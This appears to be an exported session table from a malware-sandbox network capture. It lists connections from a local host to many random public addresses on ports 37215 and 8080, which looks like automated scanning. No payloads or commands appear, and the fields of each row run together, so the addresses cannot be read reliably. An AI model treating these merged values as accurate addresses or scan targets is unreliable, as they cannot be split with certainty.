                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10476192.168.2.2335524157.84.35.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10477192.168.2.233519641.131.158.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10478192.168.2.2338326157.17.243.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10479192.168.2.2355710197.144.72.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10480192.168.2.2356388197.210.107.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10481192.168.2.2351894157.116.159.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10482192.168.2.2348666157.153.0.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10483192.168.2.234608838.26.67.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10484192.168.2.2359918101.29.220.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10485192.168.2.233648841.7.169.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10486192.168.2.2356218197.26.114.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10487192.168.2.2350520157.114.135.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10488192.168.2.234520841.247.49.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10489192.168.2.2360838157.41.153.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10490192.168.2.2359856135.12.95.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10491192.168.2.234042841.75.29.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10492192.168.2.235884441.67.34.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10493192.168.2.2356678157.28.18.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10494192.168.2.2351158157.86.234.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10495192.168.2.233742841.50.38.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10496192.168.2.2348214189.25.64.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10497192.168.2.2333992197.13.132.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10498192.168.2.2358828157.174.123.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10499192.168.2.23550244.170.99.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10500192.168.2.2349480111.7.248.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10501192.168.2.2346374169.89.212.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10502192.168.2.235478041.33.236.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10503192.168.2.234954262.216.60.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10504192.168.2.235693648.219.26.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10505192.168.2.2335046157.48.79.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10506192.168.2.234863241.190.99.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10507192.168.2.2351912157.224.193.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10508192.168.2.235824268.114.44.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10509192.168.2.235105641.41.225.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10510192.168.2.235822041.6.7.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10511192.168.2.233977851.201.103.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10512192.168.2.2359362157.116.108.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10513192.168.2.2357558197.230.210.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10514192.168.2.2356770157.159.115.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10515192.168.2.2336618157.172.214.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10516192.168.2.2345542157.176.22.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10517192.168.2.234469641.22.109.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10518192.168.2.234222441.63.229.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10519192.168.2.234245241.201.224.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10520192.168.2.2334198197.131.195.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10521192.168.2.2356260197.33.180.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10522192.168.2.2360602157.44.207.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10523192.168.2.235737689.26.60.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10524192.168.2.2339606197.249.40.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10525192.168.2.2351174157.112.154.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10526192.168.2.234533641.188.53.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10527192.168.2.235321641.91.52.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10528192.168.2.2338396157.246.146.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10529192.168.2.234461441.30.131.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10530192.168.2.2333740112.160.234.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10531192.168.2.235402441.200.62.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10532192.168.2.2335368173.212.94.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10533192.168.2.2344684157.202.137.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10534192.168.2.2341402197.27.80.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10535192.168.2.2340554151.130.10.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10536192.168.2.234990441.62.178.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10537192.168.2.2349952157.68.7.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10538192.168.2.2334782197.51.6.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10539192.168.2.234651241.19.250.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10540192.168.2.2349150197.178.135.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10541192.168.2.2333406197.22.71.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10542192.168.2.2341186157.169.10.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10543192.168.2.2355054200.142.52.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10544192.168.2.2351582197.104.163.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10545192.168.2.2351486197.72.194.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10546192.168.2.2343114157.44.219.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10547192.168.2.235346641.168.38.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10548192.168.2.2348578197.79.149.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10549192.168.2.23474124.235.45.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10550192.168.2.233276841.7.95.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10551192.168.2.233948414.115.141.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10552192.168.2.2360268211.76.161.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10553192.168.2.2344398185.160.53.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10554192.168.2.2348712101.221.3.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10555192.168.2.2339046114.204.213.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10556192.168.2.23348609.30.130.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10557192.168.2.2342318209.22.21.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10558192.168.2.233420893.45.191.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10559192.168.2.235539884.113.43.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10560192.168.2.234975288.6.108.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10561192.168.2.2350240104.44.190.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10562192.168.2.2356188207.224.84.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10563192.168.2.2353538201.99.41.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10564192.168.2.2340128201.173.21.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10565192.168.2.2349818188.156.228.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10566192.168.2.2354616128.64.26.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10567192.168.2.2335612143.226.231.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10568192.168.2.2354032159.81.23.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10569192.168.2.2351600143.118.61.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10570192.168.2.2343442152.234.145.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10571192.168.2.234480098.53.11.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10572192.168.2.236012261.218.91.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10573192.168.2.2337330172.159.57.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10574192.168.2.235319885.202.134.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10575192.168.2.2353276124.192.103.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10576192.168.2.234997845.249.151.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10577192.168.2.2359242178.104.71.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10578192.168.2.235450459.155.112.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10579192.168.2.2341682122.35.67.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10580192.168.2.2345802166.175.13.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10581192.168.2.2352956109.101.192.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10582192.168.2.2348182193.93.109.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10583192.168.2.2350108113.71.207.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10584192.168.2.2355000128.31.35.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10585192.168.2.2360770181.27.27.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10586192.168.2.2351606168.245.45.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10587192.168.2.2341430204.194.51.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10588192.168.2.2350334189.181.15.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10589192.168.2.2350734172.179.141.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10590192.168.2.2350678111.78.203.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10591192.168.2.234466476.167.187.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10592192.168.2.2356668104.121.128.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10593192.168.2.2348060211.8.201.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10594192.168.2.235309637.183.78.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10595192.168.2.233845227.231.181.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10596192.168.2.2356786135.199.85.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10597192.168.2.2358202129.227.178.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10598192.168.2.2358822110.86.103.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10599192.168.2.235689447.19.63.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10600192.168.2.2352160223.195.104.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10601192.168.2.234790459.142.125.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10602192.168.2.2343578129.9.186.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10603192.168.2.234697452.169.14.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10604192.168.2.2359622167.4.98.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10605192.168.2.233321631.188.178.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10606192.168.2.2338538142.44.80.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10607192.168.2.23362908.180.141.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10608192.168.2.2339314196.103.33.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10609192.168.2.2342630141.82.125.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10610192.168.2.2360712105.66.139.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10611192.168.2.2338102152.247.241.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10612192.168.2.2352076160.175.132.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10613192.168.2.235273644.81.70.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10614192.168.2.2336466195.33.147.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10615192.168.2.2336672100.146.19.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10616192.168.2.2342192158.184.128.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10617192.168.2.2339192196.131.230.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10618192.168.2.2357984205.65.15.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10619192.168.2.233638452.84.217.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10620192.168.2.2344324207.103.169.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10621192.168.2.2354542134.129.56.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10622192.168.2.233876670.197.149.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10623192.168.2.235436866.230.234.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10624192.168.2.233360480.204.186.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10625192.168.2.2347734105.119.127.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10626192.168.2.2346196108.179.253.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10627192.168.2.2346530124.254.2.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10628192.168.2.2341294111.63.155.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10629192.168.2.2346780202.171.17.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10630192.168.2.234129865.112.16.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10631192.168.2.2356846193.16.16.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10632192.168.2.2336148101.46.153.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10633192.168.2.234747466.73.139.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10634192.168.2.2360134134.83.116.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10635192.168.2.234229018.255.193.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10636192.168.2.2339970107.185.94.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10637192.168.2.2360724163.209.130.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10638192.168.2.2342724196.157.128.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10639192.168.2.2344372116.72.224.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10640192.168.2.2350474200.99.249.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10641192.168.2.2334540161.89.205.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10642192.168.2.2334212144.24.176.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10643192.168.2.233525036.4.27.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10644192.168.2.234710057.121.36.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10645192.168.2.2340492151.194.114.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10646192.168.2.2359044189.186.70.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10647192.168.2.2343384201.246.22.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10648192.168.2.23395789.143.36.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10649192.168.2.2340844143.219.195.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10650192.168.2.2341626186.241.83.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10651192.168.2.2354384213.32.65.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10652192.168.2.2344236131.108.8.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10653192.168.2.2345490132.137.116.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10654192.168.2.2348206110.85.2.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10655192.168.2.2347586165.6.89.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10656192.168.2.235473424.102.186.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10657192.168.2.235920218.196.79.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10658192.168.2.235043280.137.1.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10659192.168.2.2346234158.254.247.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10660192.168.2.2335244159.182.61.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10661192.168.2.235226053.0.12.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10662192.168.2.2356768187.225.70.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10663192.168.2.2336594114.140.28.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10664192.168.2.2347486197.164.57.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10665192.168.2.23570765.150.59.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10666192.168.2.234217827.93.228.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10667192.168.2.2338552157.130.237.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10668192.168.2.2349904207.21.120.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10669192.168.2.2336554154.110.230.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10670192.168.2.234686680.249.125.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10671192.168.2.2333126216.172.245.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10672192.168.2.235741067.171.70.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10673192.168.2.2342036202.57.254.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10674192.168.2.235637239.21.17.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10675192.168.2.235784835.155.103.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10676192.168.2.2359048156.146.251.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10677192.168.2.235927866.7.198.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10678192.168.2.235380099.168.193.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10679192.168.2.2347108112.251.232.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10680192.168.2.235829479.11.21.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10681192.168.2.2338956202.121.10.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10682192.168.2.2356188220.194.77.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10683192.168.2.2348792178.176.183.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10684192.168.2.233334023.59.254.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10685192.168.2.2344828207.167.164.438080
